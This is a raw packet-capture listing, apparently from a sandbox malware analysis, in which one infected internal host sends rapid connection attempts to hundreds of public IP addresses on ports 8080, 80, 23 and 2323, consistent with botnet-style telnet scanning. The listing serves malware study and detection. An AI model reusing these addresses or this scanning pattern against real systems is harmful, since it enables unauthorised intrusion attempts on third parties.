                                                              Nov 13, 2023 22:17:57.730034113 CET139488080192.168.2.2331.156.173.153
                                                              Nov 13, 2023 22:17:57.730035067 CET139488080192.168.2.2385.108.203.120
                                                              Nov 13, 2023 22:17:57.730040073 CET1343680192.168.2.23112.152.15.72
                                                              Nov 13, 2023 22:17:57.730040073 CET139488080192.168.2.2385.135.69.137
                                                              Nov 13, 2023 22:17:57.730040073 CET139488080192.168.2.2331.129.65.32
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2385.209.248.237
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2395.165.251.86
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2395.197.58.29
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2331.176.76.42
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2394.185.36.246
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2331.203.41.180
                                                              Nov 13, 2023 22:17:57.730189085 CET139488080192.168.2.2394.9.17.254
                                                              Nov 13, 2023 22:17:57.730197906 CET139488080192.168.2.2362.52.127.203
                                                              Nov 13, 2023 22:17:57.730197906 CET139488080192.168.2.2394.138.55.50
                                                              Nov 13, 2023 22:17:57.730197906 CET139488080192.168.2.2331.233.101.251
                                                              Nov 13, 2023 22:17:57.730197906 CET139488080192.168.2.2395.69.72.39
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2394.68.26.43
                                                              Nov 13, 2023 22:17:57.730197906 CET139488080192.168.2.2385.178.192.134
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2362.52.19.204
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2331.142.246.44
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2385.174.212.58
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2395.88.30.8
                                                              Nov 13, 2023 22:17:57.730197906 CET139488080192.168.2.2395.187.45.139
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2362.189.98.216
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2395.12.67.146
                                                              Nov 13, 2023 22:17:57.730202913 CET139488080192.168.2.2331.228.80.226
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2395.100.182.44
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2362.191.37.143
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2331.12.113.152
                                                              Nov 13, 2023 22:17:57.730202913 CET139488080192.168.2.2362.140.18.210
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2385.91.150.67
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2331.243.102.56
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2385.139.47.228
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2395.100.121.115
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2385.121.161.255
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2331.211.177.25
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2331.43.52.93
                                                              Nov 13, 2023 22:17:57.730202913 CET139488080192.168.2.2362.57.152.210
                                                              Nov 13, 2023 22:17:57.730200052 CET139488080192.168.2.2394.214.45.225
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2362.216.223.13
                                                              Nov 13, 2023 22:17:57.730202913 CET139488080192.168.2.2395.48.130.198
                                                              Nov 13, 2023 22:17:57.730214119 CET139488080192.168.2.2385.253.226.76
                                                              Nov 13, 2023 22:17:57.730216026 CET139488080192.168.2.2385.126.210.240
                                                              Nov 13, 2023 22:17:57.730202913 CET139488080192.168.2.2395.73.254.108
                                                              Nov 13, 2023 22:17:57.730201006 CET1343680192.168.2.23112.180.58.193
                                                              Nov 13, 2023 22:17:57.730216026 CET139488080192.168.2.2394.114.54.206
                                                              Nov 13, 2023 22:17:57.730201006 CET139488080192.168.2.2385.171.89.160
                                                              Nov 13, 2023 22:17:57.730202913 CET139488080192.168.2.2395.108.54.244
                                                              Nov 13, 2023 22:17:57.730216026 CET139488080192.168.2.2385.231.205.60
                                                              Nov 13, 2023 22:17:57.730231047 CET139488080192.168.2.2385.85.105.25
                                                              Nov 13, 2023 22:17:57.730231047 CET139488080192.168.2.2395.250.122.254
                                                              Nov 13, 2023 22:17:57.730231047 CET139488080192.168.2.2331.96.96.177
                                                              Nov 13, 2023 22:17:57.730231047 CET139488080192.168.2.2385.65.170.157
                                                              Nov 13, 2023 22:17:57.730231047 CET1343680192.168.2.23112.138.156.233
                                                              Nov 13, 2023 22:17:57.730231047 CET1343680192.168.2.23112.123.129.93
                                                              Nov 13, 2023 22:17:57.730231047 CET139488080192.168.2.2362.88.123.181
                                                              Nov 13, 2023 22:17:57.730231047 CET139488080192.168.2.2362.212.232.63
                                                              Nov 13, 2023 22:17:57.730246067 CET139488080192.168.2.2385.35.185.3
                                                              Nov 13, 2023 22:17:57.730246067 CET139488080192.168.2.2395.65.149.175
                                                              Nov 13, 2023 22:17:57.730246067 CET139488080192.168.2.2362.219.141.173
                                                              Nov 13, 2023 22:17:57.730246067 CET139488080192.168.2.2385.38.223.252
                                                              Nov 13, 2023 22:17:57.730246067 CET139488080192.168.2.2331.18.52.120
                                                              Nov 13, 2023 22:17:57.730246067 CET139488080192.168.2.2385.60.101.107
                                                              Nov 13, 2023 22:17:57.730268002 CET139488080192.168.2.2385.109.198.116
                                                              Nov 13, 2023 22:17:57.730268002 CET1343680192.168.2.23112.74.253.55
                                                              Nov 13, 2023 22:17:57.730268955 CET139488080192.168.2.2331.59.62.23
                                                              Nov 13, 2023 22:17:57.730282068 CET139488080192.168.2.2362.107.168.68
                                                              Nov 13, 2023 22:17:57.730282068 CET139488080192.168.2.2385.59.165.117
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2395.197.239.128
                                                              Nov 13, 2023 22:17:57.730282068 CET139488080192.168.2.2385.88.167.246
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2362.118.61.139
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2331.129.245.224
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2362.110.219.146
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2394.76.67.176
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2394.230.245.252
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2362.181.81.12
                                                              Nov 13, 2023 22:17:57.730283022 CET139488080192.168.2.2395.146.1.94
                                                              Nov 13, 2023 22:17:57.730289936 CET139488080192.168.2.2394.82.204.194
                                                              Nov 13, 2023 22:17:57.730289936 CET1343680192.168.2.23112.134.101.53
                                                              Nov 13, 2023 22:17:57.730289936 CET139488080192.168.2.2394.227.43.43
                                                              Nov 13, 2023 22:17:57.730289936 CET1343680192.168.2.23112.237.212.2
                                                              Nov 13, 2023 22:17:57.730289936 CET139488080192.168.2.2385.28.125.238
                                                              Nov 13, 2023 22:17:57.730289936 CET1343680192.168.2.23112.198.137.108
                                                              Nov 13, 2023 22:17:57.730312109 CET1343680192.168.2.23112.75.183.29
                                                              Nov 13, 2023 22:17:57.730312109 CET1343680192.168.2.23112.222.225.199
                                                              Nov 13, 2023 22:17:57.730312109 CET139488080192.168.2.2362.183.49.78
                                                              Nov 13, 2023 22:17:57.730314970 CET139488080192.168.2.2362.30.210.146
                                                              Nov 13, 2023 22:17:57.730314970 CET139488080192.168.2.2394.87.179.189
                                                              Nov 13, 2023 22:17:57.730329990 CET139488080192.168.2.2395.44.244.91
                                                              Nov 13, 2023 22:17:57.730329990 CET139488080192.168.2.2394.103.183.156
                                                              Nov 13, 2023 22:17:57.730333090 CET139488080192.168.2.2394.82.49.39
                                                              Nov 13, 2023 22:17:57.730333090 CET139488080192.168.2.2362.109.204.100
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2394.227.197.198
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2385.25.239.242
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2395.186.228.175
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2362.42.187.166
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2395.227.118.142
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2331.108.251.234
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2394.170.81.209
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2362.73.214.235
                                                              Nov 13, 2023 22:17:57.730345964 CET139488080192.168.2.2331.158.62.178
                                                              Nov 13, 2023 22:17:57.730343103 CET139488080192.168.2.2331.30.22.172
                                                              Nov 13, 2023 22:17:57.730354071 CET139488080192.168.2.2331.151.244.183
                                                              Nov 13, 2023 22:17:57.730364084 CET1343680192.168.2.23112.25.207.242
                                                              Nov 13, 2023 22:17:57.730364084 CET139488080192.168.2.2331.209.179.154
                                                              Nov 13, 2023 22:17:57.730382919 CET139488080192.168.2.2331.186.56.119
                                                              Nov 13, 2023 22:17:57.730386019 CET1343680192.168.2.23112.122.132.131
                                                              Nov 13, 2023 22:17:57.730386019 CET1343680192.168.2.23112.155.30.12
                                                              Nov 13, 2023 22:17:57.730386019 CET139488080192.168.2.2395.111.49.168
                                                              Nov 13, 2023 22:17:57.730386019 CET139488080192.168.2.2331.247.61.218
                                                              Nov 13, 2023 22:17:57.730386019 CET139488080192.168.2.2395.78.55.110
                                                              Nov 13, 2023 22:17:57.730386019 CET139488080192.168.2.2331.211.11.147
                                                              Nov 13, 2023 22:17:57.730391979 CET139488080192.168.2.2362.94.192.111
                                                              Nov 13, 2023 22:17:57.730391979 CET139488080192.168.2.2331.136.106.179
                                                              Nov 13, 2023 22:17:57.730386019 CET139488080192.168.2.2362.183.246.24
                                                              Nov 13, 2023 22:17:57.730386019 CET139488080192.168.2.2385.31.88.193
                                                              Nov 13, 2023 22:17:57.730401993 CET139488080192.168.2.2394.180.58.128
                                                              Nov 13, 2023 22:17:57.730406046 CET139488080192.168.2.2362.187.91.153
                                                              Nov 13, 2023 22:17:57.730407000 CET1343680192.168.2.23112.41.25.118
                                                              Nov 13, 2023 22:17:57.730407000 CET139488080192.168.2.2362.175.110.40
                                                              Nov 13, 2023 22:17:57.730407000 CET1343680192.168.2.23112.180.210.165
                                                              Nov 13, 2023 22:17:57.730407000 CET139488080192.168.2.2331.242.174.58
                                                              Nov 13, 2023 22:17:57.730412960 CET139488080192.168.2.2395.240.254.63
                                                              Nov 13, 2023 22:17:57.730431080 CET139488080192.168.2.2385.119.154.39
                                                              Nov 13, 2023 22:17:57.730434895 CET1343680192.168.2.23112.14.68.94
                                                              Nov 13, 2023 22:17:57.730434895 CET139488080192.168.2.2331.10.96.127
                                                              Nov 13, 2023 22:17:57.730442047 CET139488080192.168.2.2331.8.107.175
                                                              Nov 13, 2023 22:17:57.730443954 CET139488080192.168.2.2395.39.206.169
                                                              Nov 13, 2023 22:17:57.730453968 CET139488080192.168.2.2362.95.61.120
                                                              Nov 13, 2023 22:17:57.730453968 CET139488080192.168.2.2385.207.155.79
                                                              Nov 13, 2023 22:17:57.730464935 CET139488080192.168.2.2331.240.235.126
                                                              Nov 13, 2023 22:17:57.730477095 CET139488080192.168.2.2331.81.251.228
                                                              Nov 13, 2023 22:17:57.730479002 CET139488080192.168.2.2385.96.72.161
                                                              Nov 13, 2023 22:17:57.730479002 CET139488080192.168.2.2362.3.144.183
                                                              Nov 13, 2023 22:17:57.730479002 CET139488080192.168.2.2395.45.19.6
                                                              Nov 13, 2023 22:17:57.730479002 CET139488080192.168.2.2385.115.29.188
                                                              Nov 13, 2023 22:17:57.730479002 CET139488080192.168.2.2394.116.82.58
                                                              Nov 13, 2023 22:17:57.730485916 CET139488080192.168.2.2331.130.241.42
                                                              Nov 13, 2023 22:17:57.730487108 CET139488080192.168.2.2362.39.198.233
                                                              Nov 13, 2023 22:17:57.730487108 CET1343680192.168.2.23112.174.140.203
                                                              Nov 13, 2023 22:17:57.730504036 CET139488080192.168.2.2362.187.15.151
                                                              Nov 13, 2023 22:17:57.730504990 CET139488080192.168.2.2394.110.177.64
                                                              Nov 13, 2023 22:17:57.730505943 CET139488080192.168.2.2395.117.6.34
                                                              Nov 13, 2023 22:17:57.730515003 CET139488080192.168.2.2331.212.1.71
                                                              Nov 13, 2023 22:17:57.730515957 CET139488080192.168.2.2331.72.84.127
                                                              Nov 13, 2023 22:17:57.730516911 CET1343680192.168.2.23112.56.238.194
                                                              Nov 13, 2023 22:17:57.730529070 CET139488080192.168.2.2394.219.25.153
                                                              Nov 13, 2023 22:17:57.730532885 CET139488080192.168.2.2362.156.73.185
                                                              Nov 13, 2023 22:17:57.730540991 CET139488080192.168.2.2362.196.174.169
                                                              Nov 13, 2023 22:17:57.730549097 CET139488080192.168.2.2394.3.82.48
                                                              Nov 13, 2023 22:17:57.730559111 CET1343680192.168.2.23112.0.101.19
                                                              Nov 13, 2023 22:17:57.730566025 CET1343680192.168.2.23112.223.208.60
                                                              Nov 13, 2023 22:17:57.730570078 CET139488080192.168.2.2394.144.42.44
                                                              Nov 13, 2023 22:17:57.730575085 CET139488080192.168.2.2394.164.170.222
                                                              Nov 13, 2023 22:17:57.730590105 CET139488080192.168.2.2362.30.98.37
                                                              Nov 13, 2023 22:17:57.730592012 CET139488080192.168.2.2385.101.16.109
                                                              Nov 13, 2023 22:17:57.730593920 CET139488080192.168.2.2395.52.164.242
                                                              Nov 13, 2023 22:17:57.730593920 CET139488080192.168.2.2394.218.79.160
                                                              Nov 13, 2023 22:17:57.730603933 CET139488080192.168.2.2331.251.247.57
                                                              Nov 13, 2023 22:17:57.730607986 CET139488080192.168.2.2395.61.69.64
                                                              Nov 13, 2023 22:17:57.730613947 CET139488080192.168.2.2385.12.234.74
                                                              Nov 13, 2023 22:17:57.730624914 CET139488080192.168.2.2394.56.91.208
                                                              Nov 13, 2023 22:17:57.730627060 CET139488080192.168.2.2394.10.200.59
                                                              Nov 13, 2023 22:17:57.730628967 CET139488080192.168.2.2362.59.117.89
                                                              Nov 13, 2023 22:17:57.730628967 CET139488080192.168.2.2394.158.72.146
                                                              Nov 13, 2023 22:17:57.730628967 CET1343680192.168.2.23112.202.94.29
                                                              Nov 13, 2023 22:17:57.730638027 CET139488080192.168.2.2362.222.46.2
                                                              Nov 13, 2023 22:17:57.730648041 CET139488080192.168.2.2394.209.106.77
                                                              Nov 13, 2023 22:17:57.730648994 CET139488080192.168.2.2395.115.72.236
                                                              Nov 13, 2023 22:17:57.730649948 CET139488080192.168.2.2395.175.138.11
                                                              Nov 13, 2023 22:17:57.730667114 CET139488080192.168.2.2395.219.253.59
                                                              Nov 13, 2023 22:17:57.730667114 CET1343680192.168.2.23112.158.38.174
                                                              Nov 13, 2023 22:17:57.730671883 CET139488080192.168.2.2331.124.127.196
                                                              Nov 13, 2023 22:17:57.730671883 CET139488080192.168.2.2331.215.26.54
                                                              Nov 13, 2023 22:17:57.730679989 CET139488080192.168.2.2362.185.56.67
                                                              Nov 13, 2023 22:17:57.730684996 CET139488080192.168.2.2394.154.50.75
                                                              Nov 13, 2023 22:17:57.730695963 CET1343680192.168.2.23112.105.231.75
                                                              Nov 13, 2023 22:17:57.730707884 CET139488080192.168.2.2394.203.29.249
                                                              Nov 13, 2023 22:17:57.730710030 CET139488080192.168.2.2394.229.176.16
                                                              Nov 13, 2023 22:17:57.730710030 CET139488080192.168.2.2395.40.4.196
                                                              Nov 13, 2023 22:17:57.730714083 CET139488080192.168.2.2394.89.13.235
                                                              Nov 13, 2023 22:17:57.730714083 CET139488080192.168.2.2331.99.223.118
                                                              Nov 13, 2023 22:17:57.730714083 CET139488080192.168.2.2394.122.169.34
                                                              Nov 13, 2023 22:17:57.730720043 CET139488080192.168.2.2395.62.150.142
                                                              Nov 13, 2023 22:17:57.730736017 CET139488080192.168.2.2395.5.167.198
                                                              Nov 13, 2023 22:17:57.730739117 CET1343680192.168.2.23112.52.73.244
                                                              Nov 13, 2023 22:17:57.730739117 CET139488080192.168.2.2331.18.179.24
                                                              Nov 13, 2023 22:17:57.730739117 CET139488080192.168.2.2331.26.152.42
                                                              Nov 13, 2023 22:17:57.730739117 CET139488080192.168.2.2395.15.167.223
                                                              Nov 13, 2023 22:17:57.730741024 CET139488080192.168.2.2394.96.234.70
                                                              Nov 13, 2023 22:17:57.730746984 CET139488080192.168.2.2331.2.108.166
                                                              Nov 13, 2023 22:17:57.730756998 CET139488080192.168.2.2331.117.56.141
                                                              Nov 13, 2023 22:17:57.730762959 CET139488080192.168.2.2362.69.78.66
                                                              Nov 13, 2023 22:17:57.730766058 CET139488080192.168.2.2385.175.173.132
                                                              Nov 13, 2023 22:17:57.730772972 CET139488080192.168.2.2362.48.1.139
                                                              Nov 13, 2023 22:17:57.730773926 CET1343680192.168.2.23112.184.48.205
                                                              Nov 13, 2023 22:17:57.730787992 CET139488080192.168.2.2362.57.73.182
                                                              Nov 13, 2023 22:17:57.730787992 CET139488080192.168.2.2395.227.212.18
                                                              Nov 13, 2023 22:17:57.730787992 CET139488080192.168.2.2385.27.240.31
                                                              Nov 13, 2023 22:17:57.730787992 CET139488080192.168.2.2394.86.124.206
                                                              Nov 13, 2023 22:17:57.730787992 CET139488080192.168.2.2385.199.169.153
                                                              Nov 13, 2023 22:17:57.730802059 CET139488080192.168.2.2395.124.75.206
                                                              Nov 13, 2023 22:17:57.730803013 CET139488080192.168.2.2395.48.156.178
                                                              Nov 13, 2023 22:17:57.730807066 CET139488080192.168.2.2394.181.98.16
                                                              Nov 13, 2023 22:17:57.730813026 CET139488080192.168.2.2395.171.101.198
                                                              Nov 13, 2023 22:17:57.730818987 CET1343680192.168.2.23112.55.41.40
                                                              Nov 13, 2023 22:17:57.730818987 CET1343680192.168.2.23112.239.63.63
                                                              Nov 13, 2023 22:17:57.730827093 CET139488080192.168.2.2331.124.84.9
                                                              Nov 13, 2023 22:17:57.730827093 CET139488080192.168.2.2394.154.213.74
                                                              Nov 13, 2023 22:17:57.730827093 CET139488080192.168.2.2385.107.74.59
                                                              Nov 13, 2023 22:17:57.730835915 CET139488080192.168.2.2362.109.151.109
                                                              Nov 13, 2023 22:17:57.730835915 CET139488080192.168.2.2331.57.14.247
                                                              Nov 13, 2023 22:17:57.730839014 CET139488080192.168.2.2385.5.110.214
                                                              Nov 13, 2023 22:17:57.730844021 CET139488080192.168.2.2331.128.111.132
                                                              Nov 13, 2023 22:17:57.730844975 CET139488080192.168.2.2362.246.154.9
                                                              Nov 13, 2023 22:17:57.730848074 CET1343680192.168.2.23112.98.19.20
                                                              Nov 13, 2023 22:17:57.730844975 CET139488080192.168.2.2331.77.96.26
                                                              Nov 13, 2023 22:17:57.730849028 CET139488080192.168.2.2331.137.220.193
                                                              Nov 13, 2023 22:17:57.730849028 CET139488080192.168.2.2331.145.143.254
                                                              Nov 13, 2023 22:17:57.730849028 CET139488080192.168.2.2362.250.225.190
                                                              Nov 13, 2023 22:17:57.730861902 CET139488080192.168.2.2331.195.164.186
                                                              Nov 13, 2023 22:17:57.730865955 CET139488080192.168.2.2362.130.35.7
                                                              Nov 13, 2023 22:17:57.730868101 CET1343680192.168.2.23112.194.19.187
                                                              Nov 13, 2023 22:17:57.730880976 CET1343680192.168.2.23112.142.131.90
                                                              Nov 13, 2023 22:17:57.730897903 CET139488080192.168.2.2394.101.64.188
                                                              Nov 13, 2023 22:17:57.730906963 CET1343680192.168.2.23112.73.5.143
                                                              Nov 13, 2023 22:17:57.730911016 CET139488080192.168.2.2395.132.140.23
                                                              Nov 13, 2023 22:17:57.730915070 CET139488080192.168.2.2395.234.106.32
                                                              Nov 13, 2023 22:17:57.730915070 CET139488080192.168.2.2385.4.89.147
                                                              Nov 13, 2023 22:17:57.730925083 CET139488080192.168.2.2394.155.247.113
                                                              Nov 13, 2023 22:17:57.730933905 CET139488080192.168.2.2362.219.145.173
                                                              Nov 13, 2023 22:17:57.730935097 CET1343680192.168.2.23112.77.67.246
                                                              Nov 13, 2023 22:17:57.730948925 CET139488080192.168.2.2395.84.14.209
                                                              Nov 13, 2023 22:17:57.730951071 CET139488080192.168.2.2385.64.105.119
                                                              Nov 13, 2023 22:17:57.730953932 CET139488080192.168.2.2394.106.237.212
                                                              Nov 13, 2023 22:17:57.730954885 CET139488080192.168.2.2362.7.144.95
                                                              Nov 13, 2023 22:17:57.730954885 CET139488080192.168.2.2395.184.125.46
                                                              Nov 13, 2023 22:17:57.730961084 CET139488080192.168.2.2331.102.139.118
                                                              Nov 13, 2023 22:17:57.730964899 CET139488080192.168.2.2394.45.34.156
                                                              Nov 13, 2023 22:17:57.730964899 CET139488080192.168.2.2395.194.36.0
                                                              Nov 13, 2023 22:17:57.730964899 CET1343680192.168.2.23112.120.137.17
                                                              Nov 13, 2023 22:17:57.730968952 CET139488080192.168.2.2395.214.53.141
                                                              Nov 13, 2023 22:17:57.730973005 CET139488080192.168.2.2385.45.214.122
                                                              Nov 13, 2023 22:17:57.730973005 CET139488080192.168.2.2394.4.179.16
                                                              Nov 13, 2023 22:17:57.730986118 CET139488080192.168.2.2395.217.210.28
                                                              Nov 13, 2023 22:17:57.730986118 CET139488080192.168.2.2331.131.229.242
                                                              Nov 13, 2023 22:17:57.730986118 CET139488080192.168.2.2394.137.185.44
                                                              Nov 13, 2023 22:17:57.730988026 CET139488080192.168.2.2394.64.25.188
                                                              Nov 13, 2023 22:17:57.730992079 CET139488080192.168.2.2331.107.30.88
                                                              Nov 13, 2023 22:17:57.730998039 CET139488080192.168.2.2395.29.173.66
                                                              Nov 13, 2023 22:17:57.731000900 CET139488080192.168.2.2331.11.63.78
                                                              Nov 13, 2023 22:17:57.731003046 CET139488080192.168.2.2331.247.35.58
                                                              Nov 13, 2023 22:17:57.731014967 CET139488080192.168.2.2331.152.234.187
                                                              Nov 13, 2023 22:17:57.731019020 CET139488080192.168.2.2362.147.177.219
                                                              Nov 13, 2023 22:17:57.731029987 CET139488080192.168.2.2395.207.126.99
                                                              Nov 13, 2023 22:17:57.731034994 CET139488080192.168.2.2385.70.136.207
                                                              Nov 13, 2023 22:17:57.731055975 CET1343680192.168.2.23112.102.209.117
                                                              Nov 13, 2023 22:17:57.731055975 CET139488080192.168.2.2385.156.176.67
                                                              Nov 13, 2023 22:17:57.731103897 CET139488080192.168.2.2362.42.248.85
                                                              Nov 13, 2023 22:17:57.731103897 CET139488080192.168.2.2394.189.1.198
                                                              Nov 13, 2023 22:17:57.731103897 CET139488080192.168.2.2331.164.141.245
                                                              Nov 13, 2023 22:17:57.731105089 CET139488080192.168.2.2362.146.42.158
                                                              Nov 13, 2023 22:17:57.731106043 CET139488080192.168.2.2331.27.92.109
                                                              Nov 13, 2023 22:17:57.731110096 CET139488080192.168.2.2385.225.239.20
                                                              Nov 13, 2023 22:17:57.731105089 CET139488080192.168.2.2331.85.127.147
                                                              Nov 13, 2023 22:17:57.731103897 CET139488080192.168.2.2394.4.236.183
                                                              Nov 13, 2023 22:17:57.731106043 CET139488080192.168.2.2385.146.148.215
                                                              Nov 13, 2023 22:17:57.731105089 CET139488080192.168.2.2331.113.25.159
                                                              Nov 13, 2023 22:17:57.731106043 CET139488080192.168.2.2362.70.182.6
                                                              Nov 13, 2023 22:17:57.731115103 CET139488080192.168.2.2385.152.94.33
                                                              Nov 13, 2023 22:17:57.731106043 CET1343680192.168.2.23112.113.57.186
                                                              Nov 13, 2023 22:17:57.731115103 CET139488080192.168.2.2331.255.246.129
                                                              Nov 13, 2023 22:17:57.731106043 CET139488080192.168.2.2395.8.173.199
                                                              Nov 13, 2023 22:17:57.731110096 CET139488080192.168.2.2331.140.160.11
                                                              Nov 13, 2023 22:17:57.731111050 CET139488080192.168.2.2385.162.147.20
                                                              Nov 13, 2023 22:17:57.731111050 CET139488080192.168.2.2385.108.170.174
                                                              Nov 13, 2023 22:17:57.731111050 CET139488080192.168.2.2362.110.232.246
                                                              Nov 13, 2023 22:17:57.731111050 CET139488080192.168.2.2331.204.194.199
                                                              Nov 13, 2023 22:17:57.731111050 CET1343680192.168.2.23112.120.166.45
                                                              Nov 13, 2023 22:17:57.731139898 CET139488080192.168.2.2362.202.127.192
                                                              Nov 13, 2023 22:17:57.731139898 CET139488080192.168.2.2394.182.197.93
                                                              Nov 13, 2023 22:17:57.731161118 CET1343680192.168.2.23112.108.75.26
                                                              Nov 13, 2023 22:17:57.757352114 CET442601024192.168.2.2393.123.85.5
                                                              Nov 13, 2023 22:17:57.763605118 CET113882323192.168.2.23193.96.90.187
                                                              Nov 13, 2023 22:17:57.763617992 CET1138823192.168.2.23125.213.140.215
                                                              Nov 13, 2023 22:17:57.763628960 CET1138823192.168.2.23178.61.209.245
                                                              Nov 13, 2023 22:17:57.763645887 CET1138823192.168.2.2312.115.208.32
                                                              Nov 13, 2023 22:17:57.763645887 CET1138823192.168.2.2323.185.233.149
                                                              Nov 13, 2023 22:17:57.763653040 CET1138823192.168.2.2313.171.68.2
                                                              Nov 13, 2023 22:17:57.763658047 CET1138823192.168.2.239.98.202.220
                                                              Nov 13, 2023 22:17:57.763663054 CET1138823192.168.2.23125.183.36.40
                                                              Nov 13, 2023 22:17:57.763719082 CET1138823192.168.2.2347.171.6.175
                                                              Nov 13, 2023 22:17:57.763719082 CET1138823192.168.2.23111.19.25.142
                                                              Nov 13, 2023 22:17:57.763720036 CET1138823192.168.2.2340.54.198.204
                                                              Nov 13, 2023 22:17:57.763719082 CET1138823192.168.2.23184.107.136.119
                                                              Nov 13, 2023 22:17:57.763719082 CET1138823192.168.2.23162.95.106.69
                                                              Nov 13, 2023 22:17:57.763719082 CET1138823192.168.2.23164.94.141.187
                                                              Nov 13, 2023 22:17:57.763726950 CET113882323192.168.2.23155.171.73.107
                                                              Nov 13, 2023 22:17:57.763726950 CET1138823192.168.2.23197.165.54.241
                                                              Nov 13, 2023 22:17:57.763740063 CET1138823192.168.2.23185.246.28.22
                                                              Nov 13, 2023 22:17:57.763758898 CET1138823192.168.2.23149.116.6.152
                                                              Nov 13, 2023 22:17:57.763758898 CET1138823192.168.2.23111.72.208.79
                                                              Nov 13, 2023 22:17:57.763758898 CET1138823192.168.2.23167.45.50.71
                                                              Nov 13, 2023 22:17:57.763758898 CET1138823192.168.2.23199.51.151.107
                                                              Nov 13, 2023 22:17:57.763758898 CET1138823192.168.2.2313.201.146.193
                                                              Nov 13, 2023 22:17:57.763761044 CET1138823192.168.2.23181.20.127.123
                                                              Nov 13, 2023 22:17:57.763761044 CET113882323192.168.2.23171.187.242.102
                                                              Nov 13, 2023 22:17:57.763761044 CET1138823192.168.2.23146.226.240.207
                                                              Nov 13, 2023 22:17:57.763761044 CET113882323192.168.2.2375.29.99.122
                                                              Nov 13, 2023 22:17:57.763775110 CET1138823192.168.2.23195.158.57.255
                                                              Nov 13, 2023 22:17:57.763775110 CET1138823192.168.2.23154.241.154.16
                                                              Nov 13, 2023 22:17:57.763775110 CET113882323192.168.2.23219.193.68.134
                                                              Nov 13, 2023 22:17:57.763782024 CET1138823192.168.2.23121.182.94.44
                                                              Nov 13, 2023 22:17:57.763783932 CET1138823192.168.2.23180.128.90.157
                                                              Nov 13, 2023 22:17:57.763783932 CET1138823192.168.2.23111.40.0.133
                                                              Nov 13, 2023 22:17:57.763783932 CET1138823192.168.2.2351.12.116.129
                                                              Nov 13, 2023 22:17:57.763784885 CET1138823192.168.2.23157.185.212.54
                                                              Nov 13, 2023 22:17:57.763783932 CET1138823192.168.2.2379.225.152.105
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.23101.64.22.135
                                                              Nov 13, 2023 22:17:57.763783932 CET1138823192.168.2.23206.178.195.104
                                                              Nov 13, 2023 22:17:57.763783932 CET1138823192.168.2.23136.151.128.154
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.23149.137.214.176
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.231.107.45.195
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.23205.158.48.80
                                                              Nov 13, 2023 22:17:57.763797045 CET1138823192.168.2.23129.160.152.254
                                                              Nov 13, 2023 22:17:57.763797045 CET1138823192.168.2.23212.70.145.133
                                                              Nov 13, 2023 22:17:57.763797045 CET1138823192.168.2.2391.194.183.172
                                                              Nov 13, 2023 22:17:57.763797045 CET1138823192.168.2.2380.204.43.2
                                                              Nov 13, 2023 22:17:57.763797998 CET1138823192.168.2.23179.18.250.218
                                                              Nov 13, 2023 22:17:57.763797998 CET1138823192.168.2.2358.51.20.22
                                                              Nov 13, 2023 22:17:57.763798952 CET1138823192.168.2.23137.185.240.4
                                                              Nov 13, 2023 22:17:57.763784885 CET1138823192.168.2.2376.194.87.222
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.23179.95.91.21
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.23135.134.44.252
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.2347.101.111.56
                                                              Nov 13, 2023 22:17:57.763786077 CET1138823192.168.2.23114.119.88.67
                                                              Nov 13, 2023 22:17:57.763818979 CET1138823192.168.2.23175.139.109.63
                                                              Nov 13, 2023 22:17:57.763818979 CET1138823192.168.2.2379.25.196.128
                                                              Nov 13, 2023 22:17:57.763818979 CET1138823192.168.2.2386.12.221.236
                                                              Nov 13, 2023 22:17:57.763818979 CET113882323192.168.2.2369.230.72.178
